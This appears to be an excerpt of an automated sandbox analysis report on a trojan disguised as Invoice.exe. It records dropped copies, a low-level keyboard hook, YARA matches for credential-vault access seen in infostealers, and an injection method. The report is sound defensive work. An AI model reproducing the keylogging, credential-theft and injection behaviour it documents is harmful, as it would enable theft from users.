Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

Source: C:\Users\user\Desktop\Invoice.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.kaJNzBnxbXm.exe.42aa410.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.kaJNzBnxbXm.exe.42aa410.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 20.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice.exe.4b48230.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice.exe.4acba10.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Invoice.exe

Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_0155D2A4	0_2_0155D2A4
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A23E0	0_2_078A23E0
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A20C8	0_2_078A20C8
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078AC780	0_2_078AC780
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078AC772	0_2_078AC772
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A1688	0_2_078A1688
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A1441	0_2_078A1441
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A1450	0_2_078A1450
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078AE3B8	0_2_078AE3B8
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A23D1	0_2_078A23D1
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A0219	0_2_078A0219
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A0228	0_2_078A0228
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078AF250	0_2_078AF250
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078AF260	0_2_078AF260
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A20B8	0_2_078A20B8
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A10D1	0_2_078A10D1
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A10E0	0_2_078A10E0
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A300F	0_2_078A300F
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A0006	0_2_078A0006
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A3060	0_2_078A3060
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A3070	0_2_078A3070
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A5F61	0_2_078A5F61
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A5F70	0_2_078A5F70
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078AED68	0_2_078AED68
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078ACBB8	0_2_078ACBB8
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A490E	0_2_078A490E
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 0_2_078A4910	0_2_078A4910
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_00ED41F8	10_2_00ED41F8
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_00ED4AC8	10_2_00ED4AC8
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_00EDEB71	10_2_00EDEB71
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_00ED3EB0	10_2_00ED3EB0
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_06696618	10_2_06696618
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_066934A0	10_2_066934A0
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_066955E0	10_2_066955E0
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_06697DA0	10_2_06697DA0
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_066976C0	10_2_066976C0
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_0669E3D0	10_2_0669E3D0
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_06690040	10_2_06690040
Source: C:\Users\user\Desktop\Invoice.exe	Code function: 10_2_06695D07	10_2_06695D07
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_00A6D2A4	11_2_00A6D2A4
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C223E0	11_2_06C223E0
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C220C8	11_2_06C220C8
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C21688	11_2_06C21688
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C2C780	11_2_06C2C780
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C2C772	11_2_06C2C772
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C21441	11_2_06C21441
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C21450	11_2_06C21450
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C2F25C	11_2_06C2F25C
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C2F260	11_2_06C2F260
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C20219	11_2_06C20219
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C20228	11_2_06C20228
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C223D1	11_2_06C223D1
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C2E3B8	11_2_06C2E3B8
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C210D1	11_2_06C210D1
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C210E0	11_2_06C210E0
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C220B8	11_2_06C220B8
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C23060	11_2_06C23060
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C23070	11_2_06C23070
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C25F61	11_2_06C25F61
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C25F70	11_2_06C25F70
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C2ED68	11_2_06C2ED68
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C2CBB8	11_2_06C2CBB8
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C2490F	11_2_06C2490F
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 11_2_06C24910	11_2_06C24910
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_02F041F8	15_2_02F041F8
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_02F04AC8	15_2_02F04AC8
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_02F0EB71	15_2_02F0EB71
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_02F03EB0	15_2_02F03EB0
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_02F0ADF8	15_2_02F0ADF8
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BC0A5C	15_2_06BC0A5C
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BC2008	15_2_06BC2008
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BC2007	15_2_06BC2007
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BC2CF2	15_2_06BC2CF2
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BD6618	15_2_06BD6618
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BD34A0	15_2_06BD34A0
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BD7DA0	15_2_06BD7DA0
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BD55E0	15_2_06BD55E0
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BD76C0	15_2_06BD76C0
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BD5D18	15_2_06BD5D18
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BDE3D0	15_2_06BDE3D0
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Code function: 15_2_06BD0040	15_2_06BD0040
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_007DD2A4	16_2_007DD2A4
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D23E0	16_2_068D23E0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D20C8	16_2_068D20C8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D1688	16_2_068D1688
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068DC780	16_2_068DC780
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068DC76D	16_2_068DC76D
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D1441	16_2_068D1441
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D1450	16_2_068D1450
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D0219	16_2_068D0219
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D0228	16_2_068D0228
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068DF25C	16_2_068DF25C
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068DF260	16_2_068DF260
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068DE3B8	16_2_068DE3B8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D23D1	16_2_068D23D1
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D20B8	16_2_068D20B8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D10D1	16_2_068D10D1
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D10E0	16_2_068D10E0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D3060	16_2_068D3060
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D3070	16_2_068D3070
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D5F61	16_2_068D5F61
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D5F70	16_2_068D5F70
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068DED68	16_2_068DED68
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068DCBB8	16_2_068DCBB8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D490E	16_2_068D490E
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 16_2_068D4910	16_2_068D4910
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_00EBA510	20_2_00EBA510
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_00EB4AC8	20_2_00EB4AC8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_00EBACD8	20_2_00EBACD8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_00EB3EB0	20_2_00EB3EB0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_00EB41F8	20_2_00EB41F8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_06866618	20_2_06866618
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_068634A0	20_2_068634A0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_06867DA0	20_2_06867DA0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_068655E0	20_2_068655E0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_068676C0	20_2_068676C0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_06865D18	20_2_06865D18
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_0686E3D0	20_2_0686E3D0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_06860040	20_2_06860040
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_06951DA1	20_2_06951DA1
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_06951DC8	20_2_06951DC8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 20_2_06860007	20_2_06860007
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_02DAD2A4	24_2_02DAD2A4
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_05568D08	24_2_05568D08
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_05560040	24_2_05560040
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_05560006	24_2_05560006
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_05568CF9	24_2_05568CF9
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_074223E0	24_2_074223E0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_074220C8	24_2_074220C8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_0742C77A	24_2_0742C77A
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_0742C780	24_2_0742C780
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07421688	24_2_07421688
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07421441	24_2_07421441
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07421450	24_2_07421450
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_074223D1	24_2_074223D1
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_0742E3B8	24_2_0742E3B8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_0742F250	24_2_0742F250
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_0742F260	24_2_0742F260
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07420219	24_2_07420219
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07420228	24_2_07420228
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07423060	24_2_07423060
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07423070	24_2_07423070
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_0742300F	24_2_0742300F
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_074210D1	24_2_074210D1
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_074210E0	24_2_074210E0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_074220B8	24_2_074220B8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07425F61	24_2_07425F61
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07425F70	24_2_07425F70
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07425F0F	24_2_07425F0F
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_0742ED68	24_2_0742ED68
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_0742CBB8	24_2_0742CBB8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07424901	24_2_07424901
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_07424910	24_2_07424910
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_074A36B0	24_2_074A36B0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 24_2_074A52A8	24_2_074A52A8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_02EF41F8	27_2_02EF41F8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_02EF4AC8	27_2_02EF4AC8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_02EF3EB0	27_2_02EF3EB0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_02EFEB33	27_2_02EFEB33
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06D234A0	27_2_06D234A0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06D276C0	27_2_06D276C0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06D20040	27_2_06D20040
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06E1EAC0	27_2_06E1EAC0
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06E11DC3	27_2_06E11DC3
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06E11DC8	27_2_06E11DC8
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Code function: 27_2_06D2003E	27_2_06D2003E

Source: Invoice.exe, 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1711744311.0000000004847000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename2d8b1906-b358-437e-8bd5-9446514c9756.exe4 vs Invoice.exe
Source: Invoice.exe, 00000000.00000000.1676266494.0000000000B1E000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamejvk.exe" vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1708926002.000000000127E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1730434947.000000000A600000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Invoice.exe
Source: Invoice.exe, 00000000.00000002.1709720176.00000000030E6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename2d8b1906-b358-437e-8bd5-9446514c9756.exe4 vs Invoice.exe
Source: Invoice.exe, 0000000A.00000002.4146760066.0000000000AF9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Invoice.exe
Source: Invoice.exe	Binary or memory string: OriginalFilenamejvk.exe" vs Invoice.exe

Source: Invoice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 11.2.kaJNzBnxbXm.exe.42aa410.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.kaJNzBnxbXm.exe.42aa410.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 20.2.BjTxJte.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice.exe.4b48230.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 11.2.kaJNzBnxbXm.exe.426f1f0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice.exe.4acba10.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: Invoice.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: kaJNzBnxbXm.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Invoice.exe.3e59970.3.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Invoice.exe.3e59970.3.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, cPs8D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, 72CF8egH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, G5CXsdn.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, 3uPsILA6U.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, 6oQOw74dfIt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, aMIWm.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, 3QjbQ514BDx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Invoice.exe.4b48230.5.raw.unpack, 3QjbQ514BDx.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.Invoice.exe.a600000.8.raw.unpack, jGxU6uLS0cTcaSem1E.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, jGxU6uLS0cTcaSem1E.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, jGxU6uLS0cTcaSem1E.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Invoice.exe.a600000.8.raw.unpack, UiJ0ge5mBiTTGJJUcf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, UiJ0ge5mBiTTGJJUcf.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, jGxU6uLS0cTcaSem1E.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, jGxU6uLS0cTcaSem1E.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Invoice.exe.4a4f1f0.2.raw.unpack, jGxU6uLS0cTcaSem1E.cs	Security API names: _0020.AddAccessRule

Source: 0.2.Invoice.exe.30b3b58.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Invoice.exe.56a0000.6.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.Invoice.exe.30c41b8.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@37/20@3/3

Source: C:\Users\user\Desktop\Invoice.exe

File created: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:648:120:WilError_03

Source: C:\Users\user\Desktop\Invoice.exe

File created: C:\Users\user\AppData\Local\Temp\tmpA865.tmp

Jump to behavior

